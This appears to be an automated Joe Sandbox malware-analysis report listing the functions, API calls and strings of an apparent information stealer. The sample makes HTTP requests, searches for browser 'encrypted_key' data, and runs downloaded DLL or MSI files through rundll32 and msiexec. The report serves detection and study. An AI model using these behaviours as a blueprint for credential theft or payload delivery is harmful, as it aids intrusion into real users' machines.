String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: e9576d4624dfa837ab4974d4396e9c9dcd0c2156a4b5616304bc028ee2d09132
Instruction ID: e8b8174d5854b946799761b5b1543a04bee3eb421270c405a1fad11c2a21c3b1
Opcode Fuzzy Hash: e9576d4624dfa837ab4974d4396e9c9dcd0c2156a4b5616304bc028ee2d09132
Instruction Fuzzy Hash: 847110B5910208AFDB04EFE4DC89FEEB7B9BF48300F148619F515A7290DB38A945CB65

Function 6C63D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C63D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C63D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C63D52A
GetCurrentThreadId.KERNEL32 ref: 6C63D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C63D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C63D55F
free.MOZGLUE(00000000), ref: 6C63D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C63D5D3
GetCurrentThreadId.KERNEL32 ref: 6C63D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C63D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C63D652
GetCurrentThreadId.KERNEL32 ref: 6C63D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C63D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C63D6A2

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: d906df917e756023d19e5c480b991b7f453bf49fd155a10a4c6e611498817137
Instruction ID: fd137c08f39d327521a99bb463229c76f8bfba99e1690960451ec1286d674b33
Opcode Fuzzy Hash: d906df917e756023d19e5c480b991b7f453bf49fd155a10a4c6e611498817137
Instruction Fuzzy Hash: 42517E71604705DFC704DF36C884A9ABBF4FF89358F00962DE95A87710DB30A845CB9A

Function 004817A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 004817C5
ExitProcess.KERNEL32 ref: 004817D1

Strings

block, xrefs: 004817B7

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: ce72b869b09eef58b445e4753104622cc02f21895d830b2a0699e8571d50bb70
Instruction ID: cfdb93cda2a8d77fcafc8886a9926d57d625e1c24bff9cd7750956668e19b74d
Opcode Fuzzy Hash: ce72b869b09eef58b445e4753104622cc02f21895d830b2a0699e8571d50bb70
Instruction Fuzzy Hash: D3519FB4A00209EFDB04EFA4D954BBE37B9BF04304F10995BE405A7360D778E952CB6A

Function 00482E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

ShellExecuteEx.SHELL32(0000003C), ref: 004831C5
ShellExecuteEx.SHELL32(0000003C), ref: 0048335D
ShellExecuteEx.SHELL32(0000003C), ref: 004834EA

Strings

"" , xrefs: 0048309A
C:\Windows\system32\rundll32.exe, xrefs: 00483332
C:\Windows\system32\msiexec.exe, xrefs: 004834BF
.msi, xrefs: 00483398
/passive, xrefs: 0048345B
/i ", xrefs: 004833E4
<, xrefs: 00483490
.dll, xrefs: 004831E5

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: d4d7fe6573d09178a3a17dd720671cf036f474c69dbd4bba8171b4dc9e79e283
Instruction ID: c69f48aa7c373b186fcf8b67230963c7b8886ced6050d97153745d908a6f738e
Opcode Fuzzy Hash: d4d7fe6573d09178a3a17dd720671cf036f474c69dbd4bba8171b4dc9e79e283
Instruction Fuzzy Hash: 8B121E718001089AEB15FBA1CC92FDDB778AF14304F50495FE50666191EFBC2B9ACB6A

Function 6C62EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C629420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5F4A68), ref: 6C62945E
Part of subcall function 6C629420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C629470
Part of subcall function 6C629420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C629482
Part of subcall function 6C629420: __Init_thread_footer.LIBCMT ref: 6C62949F

GetCurrentThreadId.KERNEL32 ref: 6C62EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C62EC8C

Part of subcall function 6C6294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6294EE
Part of subcall function 6C6294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C629508

GetCurrentThreadId.KERNEL32 ref: 6C62ECA1
AcquireSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C62ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C62ECC5
ReleaseSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C62ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C62ED19
CloseHandle.KERNEL32(?), ref: 6C62ED28
free.MOZGLUE(00000000), ref: 6C62ED2F
ReleaseSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C62ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C62EC94

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 1dad5124ebc3f8ad7eb1cebdb0251ddb5dd11d80a7bf07c01e5f4478435ea491
Instruction ID: e25c00a5bc2e3517625795a835a51ce814423f45b52336802798f0a7e03978a1
Opcode Fuzzy Hash: 1dad5124ebc3f8ad7eb1cebdb0251ddb5dd11d80a7bf07c01e5f4478435ea491
Instruction Fuzzy Hash: 47219175600104EBDB009F67D848BAA77B9EF8636DF104621FD1897B41DB3998068FAF

Function 6C60C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C60C5A3
WideCharToMultiByte.KERNEL32 ref: 6C60C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C60C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C60CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C60CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C60CAA5

Strings

0, xrefs: 6C60D30A
(null), xrefs: 6C60C596

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 8b0fa39a0a2b5648edc75b31208807d00c7590170208b8218a816af8452c723f
Instruction ID: ab75380f9bab7ea04c4825a57976cca99679ad290deee1e9e6e17fbb66c84c4e
Opcode Fuzzy Hash: 8b0fa39a0a2b5648edc75b31208807d00c7590170208b8218a816af8452c723f
Instruction Fuzzy Hash: 42A1B030308341AFDB18DF29C68475ABBE0AFC9758F04891CE98AE3241D731D805CBAA

Function 004852C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 00476280: InternetOpenA.WININET(00490DFE,00000001,00000000,00000000,00000000), ref: 004762E1
Part of subcall function 00476280: StrCmpCA.SHLWAPI(?,0110E8F8), ref: 00476303
Part of subcall function 00476280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
Part of subcall function 00476280: HttpOpenRequestA.WININET(00000000,GET,?,0110E278,00000000,00000000,00400100,00000000), ref: 00476385
Part of subcall function 00476280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
Part of subcall function 00476280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485318
lstrlen.KERNEL32(00000000), ref: 0048532F

Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00485364
lstrlen.KERNEL32(00000000), ref: 00485383
lstrlen.KERNEL32(00000000), ref: 004853AE

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Strings

ERROR, xrefs: 004853B9
ERROR, xrefs: 00485432
ERROR, xrefs: 004854A9
ERROR, xrefs: 0048530A
ERROR, xrefs: 0048546F

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: f0588014511e6c18cdaf3ad0d6b6316384da649a5ee87cd53537b7d720a72510
Instruction ID: 6b015892b98b068dbfc9455735fa27259d57fd5272d7880ecf4fba40e257bac2
Opcode Fuzzy Hash: f0588014511e6c18cdaf3ad0d6b6316384da649a5ee87cd53537b7d720a72510
Instruction Fuzzy Hash: 52514F70910108ABEB18FF65C992AED3779AF10304F50482FF40A56591EF7C6B56CB7A

Function 6C5E3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C5E3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C5E34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C5E34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C5E350E
__Init_thread_footer.LIBCMT ref: 6C5E3522
__aulldiv.LIBCMT ref: 6C5E3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C5E357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C5E3592

Part of subcall function 6C61AB89: EnterCriticalSection.KERNEL32(6C66E370,?,?,?,6C5E34DE,6C66F6CC,?,?,?,?,?,?,?,6C5E3284), ref: 6C61AB94
Part of subcall function 6C61AB89: LeaveCriticalSection.KERNEL32(6C66E370,?,6C5E34DE,6C66F6CC,?,?,?,?,?,?,?,6C5E3284,?,?,6C6056F6), ref: 6C61ABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C5E3508
kernel32.dll, xrefs: 6C5E34EA

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 5515e83d369a98fd61ba7fa217f9b43dad348f52118034863c9996370e8b8a24
Instruction ID: bcfe942945a2a1cf3a08d9ccd52544c1a73de2c2fc475626e56feb3ab5d7d10a
Opcode Fuzzy Hash: 5515e83d369a98fd61ba7fa217f9b43dad348f52118034863c9996370e8b8a24
Instruction Fuzzy Hash: 30315271B002059BDF04DFBBCC98ABA77B5FB8A305F10441AE545D7760EA709905CB6A

Function 6C5E4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C624843,?), ref: 6C5E45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C624843,?), ref: 6C5E468A
free.MOZGLUE(?,?,?,?,?,?,6C624843,?), ref: 6C5E46C9
free.MOZGLUE(?), ref: 6C5E46EF
free.MOZGLUE(?), ref: 6C5E4712
free.MOZGLUE(?), ref: 6C5E4735
free.MOZGLUE(?), ref: 6C5E4758
free.MOZGLUE(?), ref: 6C5E477B
free.MOZGLUE(?), ref: 6C5E479E

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: bb9eed9bae01070815ef002a95d075d898828578c057c4bf421161303e35d4a4
Instruction ID: 66c5a88357f90285a1f4fd9fd02d6a94dfac140856192d83c3f36aaaba8dc4ed
Opcode Fuzzy Hash: bb9eed9bae01070815ef002a95d075d898828578c057c4bf421161303e35d4a4
Instruction Fuzzy Hash: B4B1F472A041508FDB18DFBCDC9476D77A6AF4A328F184A69E416DFB92E730D840CB81

Function 004812D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 080fa5b5c2385fac9a55b91fdc17293b607361c154447fca5ba22bfa789737d6
Instruction ID: fd7948e206a19e0b002d69846264f3ee61da9a3113884e6f5adafa7ad4c00c85
Opcode Fuzzy Hash: 080fa5b5c2385fac9a55b91fdc17293b607361c154447fca5ba22bfa789737d6
Instruction Fuzzy Hash: 2EC1A5B59001099BCB14FF60DC89FEE7379BB54308F0049DEE10A67251DB78AA85CFA5

Function 00484280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B

lstrcat.KERNEL32(?,00000000), ref: 004842EC
lstrcat.KERNEL32(?,0110E1E8), ref: 0048430B
lstrcat.KERNEL32(?,?), ref: 0048431F
lstrcat.KERNEL32(?,0110CE40), ref: 00484333

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 00488D90: GetFileAttributesA.KERNEL32(00000000,?,00471B54,?,?,0049564C,?,?,00490E1F), ref: 00488D9F

Part of subcall function 00479CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00479D39

Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
